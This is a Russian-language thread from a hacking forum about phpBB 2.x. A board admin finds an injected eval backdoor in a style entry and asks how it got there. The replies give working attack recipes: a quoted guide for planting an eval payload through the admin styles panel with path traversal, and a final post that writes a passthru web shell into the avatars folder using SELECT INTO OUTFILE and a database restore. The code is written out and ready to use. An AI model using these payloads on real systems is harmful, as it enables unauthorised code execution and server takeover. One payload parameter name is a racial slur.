HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Сломать phpbb через стили
  #1  
Старый 21.02.2008, 12:19
cow
Новичок
Регистрация: 11.04.2006
Сообщений: 26
С нами: 10569767

Репутация: 4
По умолчанию Сломать phpbb через стили

Стоит пхпбб 2.0.22. Щас в стилях обнаружил мною не до конца удаленный стиль, но уже кем то обработанный:

Style: FI
Template: aaa=12;eval(stripslashes($_REQUEST[nigga]));exit();// /../../../../../../../../../../../../../../../../../../../tmp

Что это, попытка или уже состовшийся взлом? Я думаю попытка ибо этот код вроде нигде не будет выполняться. Было ли это сделано через акк админа или тут поработали SQL иньекциями? Всем спасибо за версии.
 
Ответить с цитированием

  #2  
Старый 21.02.2008, 12:22
cow
Новичок
Регистрация: 11.04.2006
Сообщений: 26
С нами: 10569767

Репутация: 4
По умолчанию

Ещё раз в потверждении моей версии, что код выполняться не будет.

Цитата:
Could not open aaa=12;eval(stripslashes($_REQUEST[nigga]));exit();// /../../../../../../../../../../../../../../../../../../../tmp template config file
Phpbb работает с этой строчкой не более как с именем файла. Но по прежнему интересует каким образом это значение забито, через ак админа вроде так не сделаешь, значит добрались до базы?
 
Ответить с цитированием

  #3  
Старый 21.02.2008, 12:24
Isis
Флудер
Регистрация: 20.11.2006
Сообщений: 3,315
С нами: 10248806

Репутация: 2371


По умолчанию

Попытка...попробуй выставить этот стиль и изменить немного адрес, добавив ?nigga=phpinfo();
 
Ответить с цитированием

  #4  
Старый 21.02.2008, 12:36
cow
Новичок
Регистрация: 11.04.2006
Сообщений: 26
С нами: 10569767

Репутация: 4
По умолчанию

Проверил на всякий - но ничего, тоже самое. Через ак админа такую тему реально было замутить? Я просто догадываюсь кто меня ломает, там ломаки сидят - максимум пароль админа сбрутят. Но через админку template_сonfig_file вроде ни как не изменишь?? Да и про SQL иньекции в админке я так же не слышал. Поэтому не могу понять как это злоумышленнику удалось?!

Последний раз редактировалось cow; 21.02.2008 в 12:43..
 
Ответить с цитированием

  #5  
Старый 21.02.2008, 14:46
blackybr
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
С нами: 10516826

Репутация: 3742


По умолчанию

в админке можно выполнить любые скл запросы посредством "восстановление бд"

создаешь файлик 1.sql и пишешь в нем любые запросы, потом грузишь и они выполнились

внимательнее читай прикрепленный топ про пхпбб

Цитата:
2) Через стили. (Нужны админские права).
Суть баги читайте в инете, было выложено.
как юзать:
Идем в админскую панель, жмакаем ссылку в Стилях "Создать". Правим правый фрейм.(Я предпочитаю править прям в опере, жмем исходный код, правим страницу, и жмем обновить из кеша.) style_name делаем произвольным. А template_name удаляем дефолтный(subSilver) и вставляем свой
Код:

a=12;eval($_REQUEST[kiborg]);exit(0);//../../../../../../../tmp/

Мы создали стиль, теперь надо его экспортировать в форум. Жмем ссылку "Экспорт", там будет тока текущий стиль, правим сурс, меняем его на
Код:

a=12;eval($_REQUEST[kiborg]);exit(0);//../../../../../../../tmp/

В папке /tmp/ появиться файл theme_info.cfg.
Заходя по ссылке
http://localhost/phpbb13/admin/admin_styles.php?mode=addnew&sid=(тут_ваша_ сессия)&&install_to=../../../../../../../tmp/&kiborg=phpinfo();
нам покажеться phpinfo();

Exploit: http://milw0rm.com/exploits/1247
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
 
Ответить с цитированием

  #6  
Старый 21.02.2008, 17:36
cow
Новичок
Регистрация: 11.04.2006
Сообщений: 26
С нами: 10569767

Репутация: 4
По умолчанию

Спасибо. Вот что выдал форум

Цитата:
Warning: main(./../templates/tmp/theme_info.cfg): failed to open stream: No such file or directory in ---- on line 78

Warning: main(): Failed opening './../templates/tmp/theme_info.cfg' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in ---- on line 78
Я так понимаю на 2.0.22 бага не актуальна?
 
Ответить с цитированием

  #7  
Старый 24.04.2008, 19:32
~!DoK_tOR!~
Banned
Регистрация: 10.11.2006
Сообщений: 829
С нами: 10263663

Репутация: 1559


По умолчанию

1. Идём в админку и делаем полную копию базы данных .
2. Теперь нам нужно узнать установочную директорию форума
смотри тут https://forum.antichat.ru/threadnav24488-1-10.html
а теперь правим базу находим такую строку:

PHP код:
INSERT INTO phpbb_categories (cat_idcat_titlecat_orderVALUES('1''test''10'); 
PHP код:
INSERT INTO phpbb_categories (cat_id, cat_title, cat_order) VALUES('1', '<? passthru("$cmd"); ?>', '10');
SELECT cat_title INTO OUTFILE '/тут_твой_путь_до_форума/images/avatars/shell.php' FROM phpbb_categories where cat_id=1; 
UPDATE phpbb_categories SET cat_title='test'WHERE cat_id=1;
восстанавливаем базу

http://site.com/phpBB/images/avatars/shell.php?cmd=ls - тут твой шелл

Последний раз редактировалось ~!DoK_tOR!~; 24.04.2008 в 19:39..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
phpBB. Как залить шелл через уязвимость в admin_styles? Grema Уязвимости CMS / форумов 14 22.02.2006 17:39
Заливка шелла на phpBB 2.0.6 через highlights ded2006 Уязвимости CMS / форумов 22 12.01.2006 07:29
Вопрос о залиаке шелла через phpBB 2.0.6. Guest Уязвимости CMS / форумов 6 23.12.2004 22:12
Как залить шелл через PhPBB SheFF Уязвимости CMS / форумов 5 29.11.2004 01:25



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...
×

ESCROW ADMIN PANEL

Загрузка...
Загрузка...